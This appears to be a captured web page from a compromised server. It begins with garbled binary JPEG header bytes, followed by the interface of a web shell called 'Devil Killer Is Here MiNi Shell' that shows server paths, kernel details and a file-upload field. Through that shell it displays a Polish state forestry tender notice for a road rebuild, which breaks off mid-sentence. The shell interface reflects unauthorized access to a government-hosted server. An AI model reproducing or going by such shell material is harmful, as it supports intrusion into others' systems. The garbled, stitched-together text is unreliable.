JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20190417/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20190417/538835-N-2019.html

 <script type="text/javascript">//<![CDATA[//]]></script> <div> <style type="text/css"> .divRow_xforms { float: left; width: 100%; font-weight: normal; line-height: 30px; } .headerLarge_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: larger} .headerMedium_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: medium} .headerSmall_xforms { font-weight: bold; font-size: x-small;} .table_xforms { border-collapse: collapse; width: 900px; font-weight: normal} .table_xforms td { border: 2px solid black; border-collapse: collapse; padding: 5px;} .table_xforms th { border: 2px solid black; border-collapse: collapse; padding: 5px; font-weight: bold} @media print { .no-print, .no-print * { display: none !important; } } </style> <br /> <br /> <span id="ctl00_ContentPlaceHolder1_lblNumerOgloszenia">Ogłoszenie nr 538835-N-2019 z dnia 2019-04-17 r. </span> <br /> <br /> <div class="divRow_xforms"> <div class="headerMedium_xforms" style="text-align: center"> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc_h">PGL LP Nadleśnictwo Rudy Raciborskie</span>: <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu_h">,,Przebudowa drogi leśnej nr 74 ,,Skośnej" położonej w leśnictwie Nędza oddz. 526, 519, 510, 497, 485, 474, 461 oraz leśnictwie Szymocice oddział 537, 531 od KM 0+000 do KM 5+050"</span><br/> OGŁOSZENIE O ZAMÓWIENIU - <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia_h">Roboty budowlane</span> </div> <div> <b>Zamieszczanie ogłoszenia:</b> <span id="ctl00_ContentPlaceHolder1_zamieszczanie_obowiazkowe">Zamieszczanie obowiązkowe</span> </div> <div> <b>Ogłoszenie dotyczy:</b> <span id="ctl00_ContentPlaceHolder1_ogloszenie_dotyczy">Zamówienia publicznego</span> </div> <div> <b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_finansowane_z_unii">Nie</span> </div> <br/> <b>Nazwa projektu lub programu</b> <br/> <span id="ctl00_ContentPlaceHolder1_nazwa_projektu_programu"></span> </div> <div> <b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_ubiegac_zaklady_pracy">Nie</span> </div> <br/> Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %) <br/> <span id="ctl00_ContentPlaceHolder1_minimalny_procent_zatrudnienia"></span> </div> <div class="headerLarge_xforms" style="text-align: left"> <u>SEKCJA I: ZAMAWIAJĄCY</u> </div> <div style="padding-left: 20px"> <b>Postępowanie przeprowadza centralny zamawiający </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_centralny_zamawiajacy">Nie</span> </div> <b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_podmiot_zamawiajacy_powierzyl">Nie</span> </div> <b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_powierzyl"></span> <br/> <b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_wspolnie">Nie</span> </div> <br/> Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów: <br/> <br/> <b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_zamawiajacy_z_eu">Nie</span> </div> <b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej - mające zastosowanie krajowe prawo zamówień publicznych:</b> <span id="ctl00_ContentPlaceHolder1_postepowanie_wspolne_tresc"></span> <br/> <b>Informacje dodatkowe:</b> <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_zamawiajacy"></span> <br/> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>I. 1) NAZWA I ADRES: </b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_nazwa">PGL LP Nadleśnictwo Rudy Raciborskie</span>, krajowy numer identyfikacyjny <span id="ctl00_ContentPlaceHolder1_regon">27253629600000</span>, ul. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_ulica">Rogera</span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_domu">1</span> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_mieszkania"></span> , <span id="ctl00_ContentPlaceHolder1_zamawiajacy_kod_pocztowy">47-430</span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc">Rudy</span>, woj. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_wojewodztwo">śląskie</span>, państwo <span id="ctl00_ContentPlaceHolder1_zamawiajacy_panstwo">Polska</span>, tel. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_telefon">+48(32)4103029</span>, e-mail <span id="ctl00_ContentPlaceHolder1_zamawiajacy_email">karolina.witek@katowice.lasy.gov.pl</span>, faks <span id="ctl00_ContentPlaceHolder1_zamawiajacy_fax">32 410 32 81</span>. <br/> Adres strony internetowej (URL): <span id="ctl00_ContentPlaceHolder1_adres_strony_url">(URL): https://bip.lasy.gov.pl/pl/bip/dg/rdlp_katowice/nadl_rudy /zamowienia_publiczne</span> <br/> Adres profilu nabywcy: <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej"></span> <br/> Adres strony internetowej pod którym można uzyskać dostęp do narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej_narzedzia"></span> </div> <div style="text-align: left"> <b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego">Inny (proszę określić):</span> <br /> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego_inny">Jednostka organizacyjna Skarbu Państwa nie posiadająca osobowości prawnej</span> </div> <div style="text-align: left"> <b> I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>: </b> <div style="padding-left: 20px"> Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających): <br/> <span id="ctl00_ContentPlaceHolder1_wspolne_udzielanie_zamowienia"></span> </div> </div> <div style="text-align: left"> <b> I.4) KOMUNIKACJA: </b> <br/> <b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_dokumentow_zamowienia">Tak</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_dokumentow_zamowienia">(URL): https://bip.lasy.gov.pl/pl/bip/dg/rdlp_katowice/nadl_rudy /zamowienia_publiczne</span> </div> <br/> <b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_zamieszczona_bedzie_specyfikacja">Tak</span> <br/> <span id="ctl00_ContentPlaceHolder1_zamieszczona_bedzie_specyfikacja">(URL): https://bip.lasy.gov.pl/pl/bip/dg/rdlp_katowice/nadl_rudy /zamowienia_publiczne</span> </div> <br/> <b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_do_dokumentow_ograniczony">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_do_dokumentow_ograniczony"></span> </div> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b> <br/> <b>Elektronicznie</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_oferty_wnioski_dostepne">Nie</span> <br/> adres <br/> <span id="ctl00_ContentPlaceHolder1_oferty_wnioski_dostepne"></span> </div> <br/> <div style="padding-left: 20px"> <b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszczone_wymagane_przeslanie_ofert">Nie</span> <br/> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_inny"></span> <br/> <b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_wymagane_przeslanie_ofert">Tak</span> <br /> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_wymagane_przeslanie_ofert_inny">Ofertę należy złożyć osobiście w sekretariacie Zamaiającego lub przesłać pocztą tradycyjną na adres Zamawiającego</span> <br/> Adres: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_adres">47-430 Rudy, ul. Rogera 1</span> </div> <br/> <b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_komunikacja_elektroniczna_wymaga">Nie</span> <br/> Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL) <br/> <span id="ctl00_ContentPlaceHolder1_komunikacja_elektroniczna_wymaga"></span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA II: PRZEDMIOT ZAMÓWIENIA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <br/> <b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b> <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu">,,Przebudowa drogi leśnej nr 74 ,,Skośnej" położonej w leśnictwie Nędza oddz. 526, 519, 510, 497, 485, 474, 461 oraz leśnictwie Szymocice oddział 537, 531 od KM 0+000 do KM 5+050"</span> <br/> <b>Numer referencyjny: </b> <span id="ctl00_ContentPlaceHolder1_numer_referencyjny">ZG.270.4.2019.KW</span> <br/> <b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b> <br/> <div style="padding-left: 20px; text-align: justify"> <span id="ctl00_ContentPlaceHolder1_czy_dialog_techniczny">Nie</span> </div> <br/> <b>II.2) Rodzaj zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia">Roboty budowlane</span> <br/> <b>II.3) Informacja o możliwości składania ofert częściowych</b> <br/> Zamówienie podzielone jest na części: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_podzielone_na_czesci">Nie</span> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b> <br/> <span id="ctl00_ContentPlaceHolder1_oferty_lub_wnioski"></span> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci"></span> <br/> </div> <b>Zamawiający zastrzega sobie prawo do udzielenia łącznie następujących części lub grup części:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zastrzega_prawo_grup_czesci"></span> <br/> <b>Maksymalna liczba części zamówienia, na które może zostać udzielone zamówienie jednemu wykonawcy:</b> <br/> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci_jednemu_wykonawcy"></span> <br/> <br/> <br/> <b> II.4) Krótki opis przedmiotu zamówienia </b> <i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane: </b> <span id="ctl00_ContentPlaceHolder1_okreslenie_przedmiotu">Przedmiotem zamówienia jest: ,,Przebudowa drogi leśnej nr 74 ,,Skośnej" położonej wleśnictwie Nędza oddz. 526, 519, 510, 497, 485, 474, 461 oraz leśnictwie Szymocice oddział 537, 531od KM 0+000 do KM 5+050" Złożona oferta musi obejmować cały zakres prac przewidzianych wSIWZ. Wykonawca nie może składać oferty jednocześnie jako konsorcjant i jako Wykonawcasamodzielny albo konsorcjant w kilku różnych konsorcjach. W przypadku wystąpienia takiej sytuacjiZamawiający odrzuci wszystkie oferty złożone z udziałem tego Wykonawcy. Termin realizacjizamówienia wynosi do 5 miesięcy od dnia podpisania umowy. Szczegółowy opis przedmiotuzamówienia zawarty jest w: 1. specyfikacji technicznej wykonania i odbioru robót (załącznik nr 9 doSIWZ) 2. projekcie budowlanym (załącznik nr 10 do SIWZ) 3. przedmiarze robót (załącznik nr 11 doSIWZ) Kruszywo przewidziane do wbudowania powinno odpowiadać, co do jakości wymogomwyrobów dopuszczonych do obrotu i stosowania w budownictwie, określonym w art. 10 ustawy Prawobudowlane tj. posiadać odpowiednie certyfikaty na znak bezpieczeństwa, być zgodne z kryteriamitechnicznymi określonymi w Polskich Normach lub normach równoważnych lub aprobatą technicznąo ile dla danego wyrobu nie ustanowiono Polskiej Normy lub norm równoważnych oraz zgodne zwłaściwymi przepisami. Ilekroć Zamawiający wskazuje w SIWZ lub załącznikach do SIWZjakiekolwiek normy równocześnie dopuszcza rozwiązania równoważne przywołanym normom.Wykonawca zobowiązany jest udzielić min. 2 lat gwarancji na wykonane roboty budowlane. Zgodnieart. 29 ust. 3a Zamawiający wymaga, aby Wykonawca lub podwykonawca lub dalszy podwykonawcaprzy realizacji przedmiotu zamówienia zatrudniał na podstawie umowy o pracę w rozumieniuprzepisów Kodeksu Pracy pracowników fizycznych, operatorów sprzętu i kierowców (prowadzącychmaszyny i pojazdy wykorzystywane przy realizacji zamówienia). Obowiązek zatrudnienia napodstawie umowy o pracę nie dotyczy sytuacji w której Wykonawca lub Podwykonawca osobiściewykonuje powyższe czynności (np. osoba fizyczna prowadząca działalność gospodarczą, wspólnicyspółki cywilnej) Przed zawarciem umowy Wykonawca zobowiązany jest przedłożyć Zamawiającemuoświadczenie o zatrudnieniu osób skierowanych do wykonywania prac fizycznych, obsługi maszyn iprowadzenia pojazdów na podstawie umowy o pracę w rozumieniu Kodeksu pracy (jeśli pracownikówfizycznych, obsługujących maszyny, prowadzących pojazdy zatrudnia podwykonawca lub dalszypodwykonawca to Wykonawca przedkłada Zamawiającemu oświadczenie podpisane przez tegopodwykonawcę lub dalszego podwykonawcę). Oświadczenie to powinno zawierać w szczególności:dokładne określenie podmiotu składającego oświadczenie, datę złożenia oświadczenia, wskazanie, żeczynności, do których odnosi się obowiązek zatrudnienia wykonują osoby zatrudnione na podstawieumowy o pracę w rozumieniu Kodeksu Pracy wraz ze wskazaniem liczby tych osób, rodzaju umowy opracę i wymiaru etatu oraz podpis osoby uprawnionej do złożenia oświadczenia w imieniuWykonawcy lub podwykonawcy (dalszego podwykonawcy). Zamawiający dopuszcza możliwośćzmiany osób, przy pomocy, których Wykonawca, podwykonawca lub dalszy podwykonawcarealizować będzie zamówienie, na inne osoby z zachowaniem wymogów dotyczących zatrudnianiatych osób na podstawie umowy o pracę. Wykonawca zobowiązany jest niezwłocznie powiadomićZamawiającego na piśmie przed dopuszczeniem tych osób do wykonywania prac. JednocześnieWykonawca zobowiązany jest do przedłożenia oświadczenia dotyczącego nowych osób zgonie z SIWZ W przypadku wątpliwości co do przestrzegania przepisów prawa pracy przez Wykonawcęlub podwykonawcę, dalszych podwykonawców Zamawiający może zwrócić się o przeprowadzeniekontroli przez Państwową Inspekcję Pracy. W przypadku naruszenia obowiązku zatrudnienia napodstawie umowy o pracę o którym mowa w powyżej Zamawiający jest uprawniony do naliczeniakary umownej w wysokości 3 000 zł za każdy ujawniony przypadek, zgodnie z zapisami Istotnychpostanowień umowy.</span> <br/> <br/> <b>II.5) Główny kod CPV: </b> <span id="ctl00_ContentPlaceHolder1_cpv_glowny_przedmiot">45233142-6</span> <br/> <b> Dodatkowe kody CPV:</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kod CPV</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45233120-6</TD></TR></TABLE> <br /> <br /> <b> II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>: <br/> Wartość bez VAT: <span id="ctl00_ContentPlaceHolder1_szacunkowa_wartosc_zamowienia_calosc"></span> <br/> Waluta: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_waluta_calosc"></span> <br/> <i>(w przypadku umów ramowych lub dynamicznego systemu zakupów - szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i> </div> <br/> <b> II.7) Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: </b> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67">Nie</span> <br/> Określenie przedmiotu, wielkości lub zakresu oraz warunków na jakich zostaną udzielone zamówienia, o których mowa w art. 67 ust. 1 pkt 6 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67_tekst"></span> <br/> <b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b> <br /> miesiącach:&#160; <span id="ctl00_ContentPlaceHolder1_okres_w_miesiacach">5</span> &#160;<i> lub </i> <b> dniach:</b> <span id="ctl00_ContentPlaceHolder1_okres_w_dniach"></span> <br /> <i>lub</i> <br /> <b> data rozpoczęcia: </b> <span id="ctl00_ContentPlaceHolder1_data_rozpoczecia"></span> &#160;<i> lub </i><b> zakończenia: </b> <span id="ctl00_ContentPlaceHolder1_data_zakonczenia"></span> <br /> <br/> <b>II.9) Informacje dodatkowe: </b> <span id="ctl00_ContentPlaceHolder1_informacje_na_temat_katalogow">Postępowanie prowadzone jest w trybie przetargu nieograniczonego napodstawie art. 10 ust. 1 oraz art. 39 - 46 ustawy z dnia 29 stycznia 2004r. Prawo zamówieńpublicznych (Dz. U. z 2018 r., poz. 1986 z późniejszymi zmianami - dalej ,,PZP") Postępowanie jestprowadzone zgodnie z zasadami przewidzianymi dla zamówień o szacunkowej wartości niższej niżkwoty określone w przepisach wydanych na podstawie art. 11 ust. 8 PZP. Postępowanie jestprowadzone zgodnie z zasadami przewidzianymi dla tzw. ,,procedury odwróconej", o której mowa wart. 24aa ust. 1 i 2 PZP. Stosownie do przywołanych przepisów Zamawiający najpierw dokona ocenyofert, a następnie zbada, czy Wykonawca, którego oferta została oceniona jako najkorzystniejsza, niepodlega wykluczeniu oraz czy spełnia warunki udziału w postępowaniu.</span> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b> III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU </b> <br/> <div style="padding-left: 20px"> <b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_okreslenie_warunkow">Zamawiający nie stawia wymagań w zakresie tego warunku.</span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_okreslenie_warunkow"></span> <br/> <b>III.1.2) Sytuacja finansowa lub ekonomiczna </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_okreslenie_warunkow">O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy dysponująśrodkami finansowymi lub zdolnością kredytową nie mniejszą niż 500 000 zł.</span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_informacje_dodatkowe"></span> <br/> <b>III.1.3) Zdolność techniczna lub zawodowa </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_okreslenie_warunkow">Warunek ten w zakresie doświadczenia zostanie spełniony, jeśli Wykonawcawykaże, że w okresie ostatnich 5 lat przed upływem terminu składania ofert (a jeżeli okresprowadzenia działalności jest krótszy - w tym okresie): zrealizował minimum 2 roboty budowlaneobejmujące budowę, przebudowę, rozbudowę, konserwację, rewitalizację lub remont drogi owartości min. 300 000zł brutto każda. Warunek ten w zakresie osób skierowanych przezWykonawcę do realizacji zamówienia zostanie spełniony, jeśli Wykonawca wykaże, że dysponujelub będzie dysponował minimum 1 osobą posiadającą uprawnienia budowlane o specjalnościdrogowej upoważniające do pełnienia samodzielnych funkcji technicznych lub odpowiadające imrównoważne uprawnienia budowlane. Dopuszcza się również odpowiadające im uprawnienia,wydane obywatelom państw Europejskiego Obszaru Gospodarczego oraz KonfederacjiSzwajcarskiej, z zastrzeżeniem art. 12a oraz innych przepisów ustawy Prawo budowlane (Dz.U z 2018 r. poz. 1202 z późn. zm.) oraz ustawy o zasadach uznawania kwalifikacji zawodowychnabytych w państwach członkowskich Unii Europejskiej (Dz. U. z 2016 r. poz. 65 z późn. zm).Warunek ten w zakresie sprzętu zostanie spełniony, jeśli Wykonawca wykaże, że dysponuje lubbędzie dysponował niezbędnym sprzętem do zrealizowania zamówienia: 1 równiarką samojezdną,1 walcem wibracyjnym lub statycznym, 5 samochodami ciężarowymi o ładowności powyżej 12ton, 1 rozkładarką do kruszywa.</span> <br/> Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób: <span id="ctl00_ContentPlaceHolder1_czy_zdolnosc_techniczna_wymaga_wykonawcow">Tak</span> <br/> Informacje dodatkowe: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_informacje_dodatkowe">Ocena spełniania warunków udziału w postępowaniu dokonana zostaniezgodnie z formułą ,,spełnia"/,,nie spełnia", w oparciu o informacje zawarte w złożonymoświadczeniu a następnie dokumentach lub oświadczeniach złożonych przez wezwanych do ichzłożenia Wykonawców. W przypadku Wykonawców wspólnie ubiegających się o udzieleniezamówienia (np. konsorcjum), każdy z warunków udziału w postępowaniu, za wyjątkiemposiadanego doświadczenia, winien spełniać co najmniej jeden z tych Wykonawców albo wszyscyci Wykonawcy wspólnie. W przypadku warunku udziału w postępowaniu dotyczącego zdolnościtechnicznej lub zawodowej w zakresie doświadczenia przynajmniej jeden z członków konsorcjumlub podmiot udostępniający zasoby w postaci doświadczenia musi samodzielnie spełniać warunekw tym zakresie. Żaden z wykonawców wspólnie ubiegających się o udzielenie zamówienia niemoże podlegać wykluczeniu z postępowania. Zamawiający może, na każdym etapie 